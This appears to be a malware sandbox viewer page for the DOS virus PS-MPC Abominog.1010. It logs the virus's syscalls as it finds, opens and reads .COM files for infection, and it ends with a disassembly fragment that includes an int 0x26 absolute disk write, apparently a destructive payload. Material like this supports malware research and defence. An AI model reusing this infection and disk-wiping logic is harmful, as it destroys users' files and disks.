Sample viewer

vx.netlux.org/Virus.DOS.PS-MPC.Abominog.1010

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:30:46.893641703Z 37 PC: 12a4d | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-17T22:30:46.89548682Z 37 PC: 12a5c | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-17T22:30:46.904082075Z 9 PC: 12aa8 | Display string (String= 'Ich bin ein Geschenk von dem Teufel ')
2018-12-17T22:30:46.906464634Z 26 PC: 12ac7 | Set disk transfer address
2018-12-17T22:30:46.917951293Z 71 PC: 12ad2 | Get current directory
2018-12-17T22:30:46.92332502Z 78 PC: 12ae2 | Find first file
2018-12-17T22:30:46.929178723Z 67 PC: 12d06 | Get or set file attributes
2018-12-17T22:30:46.945903289Z 61 PC: 12aee | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:30:46.952473947Z 63 PC: 12afa | Read file or device (Read 26 bytes on handle 5)
2018-12-17T22:30:46.963134343Z 66 PC: 12b02 | Move file pointer
2018-12-17T22:30:46.964437144Z 79 PC: 12ae2 | Find next file
2018-12-17T22:30:46.967476071Z 67 PC: 12d06 | Get or set file attributes
2018-12-17T22:30:46.978798986Z 61 PC: 12aee | Open file (Filename = 'PRINT.COM')
2018-12-17T22:30:46.986089748Z 63 PC: 12afa | Read file or device (Read 26 bytes on handle 6)
2018-12-17T22:30:46.994257475Z 66 PC: 12b02 | Move file pointer
2018-12-17T22:30:46.995793499Z 79 PC: 12ae2 | Find next file
2018-12-17T22:30:46.998404993Z 67 PC: 12d06 | Get or set file attributes
2018-12-17T22:30:47.009767969Z 61 PC: 12aee | Open file (Filename = 'HELLO.COM')
2018-12-17T22:30:47.017362791Z 63 PC: 12afa | Read file or device (Read 26 bytes on handle 7)
2018-12-17T22:30:47.023854247Z 66 PC: 12b02 | Move file pointer
2018-12-17T22:30:47.026395548Z 79 PC: 12ae2 | Find next file
2018-12-17T22:30:47.029465956Z 67 PC: 12d06 | Get or set file attributes
2018-12-17T22:30:47.041103055Z 61 PC: 12aee | Open file (Filename = 'PHANG.COM')
2018-12-17T22:30:47.04817316Z 63 PC: 12afa | Read file or device (Read 26 bytes on handle 8)
2018-12-17T22:30:47.057533077Z 66 PC: 12b02 | Move file pointer
2018-12-17T22:30:47.059384682Z 79 PC: 12ae2 | Find next file
2018-12-17T22:30:47.062701962Z 67 PC: 12d06 | Get or set file attributes
2018-12-17T22:30:47.074364667Z 61 PC: 12aee | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:30:47.081298869Z 63 PC: 12afa | Read file or device (Read 26 bytes on handle 9)
2018-12-17T22:30:47.087835052Z 66 PC: 12b02 | Move file pointer
2018-12-17T22:30:47.089633123Z 79 PC: 12ae2 | Find next file
2018-12-17T22:30:47.092276946Z 67 PC: 12d06 | Get or set file attributes
2018-12-17T22:30:47.10212438Z 61 PC: 12aee | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:30:47.109965554Z 63 PC: 12afa | Read file or device (Read 26 bytes on handle 10)
2018-12-17T22:30:47.116326821Z 66 PC: 12b02 | Move file pointer
2018-12-17T22:30:47.117739444Z 79 PC: 12ae2 | Find next file
2018-12-17T22:30:47.12119871Z 67 PC: 12d06 | Get or set file attributes
2018-12-17T22:30:47.131797785Z 61 PC: 12aee | Open file (Filename = 'PAH.COM')
2018-12-17T22:30:47.13878264Z 63 PC: 12afa | Read file or device (Read 26 bytes on handle 11)
2018-12-17T22:30:47.145451078Z 66 PC: 12b02 | Move file pointer
2018-12-17T22:30:47.146827523Z 79 PC: 12ae2 | Find next file
2018-12-17T22:30:47.149830933Z 67 PC: 12d06 | Get or set file attributes
2018-12-17T22:30:47.15993426Z 61 PC: 12aee | Open file (Filename = 'TEST.COM')
2018-12-17T22:30:47.166423299Z 63 PC: 12afa | Read file or device (Read 26 bytes on handle 12)
2018-12-17T22:30:47.169688123Z 66 PC: 12b02 | Move file pointer
2018-12-17T22:30:47.171832231Z 79 PC: 12ae2 | Find next file
2018-12-17T22:30:47.174261988Z 44 PC: 12b5f | Get time 0x12b5f: cmp dl, 0x32
0x12b62: ja 0x12b78
0x12b64: mov ah, 0x3b
0x12b66: lea dx, word ptr [bp + 0x8dd]
0x12b6a: int 0x21
0x12b6c: mov ah, 0x1a
0x12b6e: nop
0x12b6f: mov dx, 0x80
0x12b72: int 0x21
0x12b74: ret
0x12b75: int 0x20
0x12b77: add byte ptr [bx + si + 0x53], dl
0x12b7a: push cx
0x12b7b: push dx
0x12b7c: mov al, 2
0x12b7e: mov cx, 0x100
0x12b81: mov dx, 3
0x12b84: int 0x26
0x12b86: pop dx
0x12b87: pop cx